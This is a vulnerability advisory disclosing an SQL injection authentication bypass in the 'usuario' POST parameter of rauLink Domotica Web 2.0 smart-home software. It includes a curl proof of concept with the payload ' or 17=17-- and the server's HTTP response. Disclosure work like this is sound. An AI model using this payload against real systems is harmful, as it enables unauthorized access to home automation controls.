rauLink Software Domotica Web 2.0 SQL Injection Authentication Bypass  
Vendor: rauLink Software (raulsoria)  
Product web page: N/A  
Affected version: 2.0  
Summary: Smart home automation software.  
Desc: The application suffers from an SQL Injection vulnerability.  
Input passed through 'usuario' POST parameter in registraUsuario is  
not properly sanitised before being returned to the user or used in  
SQL queries. This can be exploited to manipulate SQL queries by  
injecting arbitrary SQL code and bypass the authentication mechanism.  
Tested on: Apache/2.4.6 (Ubuntu)  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
Advisory ID: ZSL-2020-5572  
Advisory URL:  
$ curl -X POST -d"usuario=' or 17=17--&password=zsl"  
HTTP/1.1 200 OK  
Date: Wed, 28 May 2008 00:06:54 GMT  
Server: Apache/2.4.6 (Ubuntu)  
X-Powered-By: PHP/5.5.3-1ubuntu2.6  
Set-Cookie: PHPSESSID=gl8tbui3skca9d74m5pg7l6q96; path=/  
Expires: Thu, 10 Dec 1983 08:52:00 GMT  
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0  
Pragma: no-cache  
Content-Length: 0  
Content-Type: text/html